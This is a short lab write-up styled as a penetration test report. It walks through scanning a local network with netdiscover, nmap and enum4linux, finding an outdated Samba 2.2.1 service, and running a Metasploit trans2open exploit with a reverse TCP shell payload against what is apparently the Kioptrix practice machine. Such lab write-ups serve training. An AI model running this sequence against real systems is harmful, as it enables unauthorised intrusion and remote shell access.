A professional penetration testing report.
In this phase, I identified the target and scanned for open services.
I used ip addr show to indetify my IP Then netdiscover to find the target IP on the local NAT network.
- Command:
ip addr show192.168.2.4 - Command:
sudo netdiscover -r 192.168.2.4/24 - Evidence: View Ip address
- Evidence: View Devices
An aggressive Nmap scan revealed several interesting ports, including 80 (HTTP) and 139/445 (SMB).
- Command:
enum4linux 192.168.2.14 - Command:
nmap -A -p- 192.168.2.14 - Evidence: View Enumeration
- Evidence: View Nmap Scan
I identified an outdated version of Samba (2.2.1) which is vulnerable to a "trans2open" overflow.
- Command: Searchsploit samba 2.2.1
- Command: Load msfconsole > search Samba 2
- Evidence: View Searchsploit
- Evidence: View msfconsole search
I then set the Responding Host, Listening Host loaded the payload then proceeded to Run(exploit)
- Command:
set RHOSTS 192.168.2.14 - Command:
set payload (linux/X86/shell/reverse-tcp) - Command:
exploit - Command:
/sbin/ifconfig - Evidence: View RHOSTS
- Evidence: View Payloads
- Evidence: View Exploit
- Evidence: View Kioptrix IP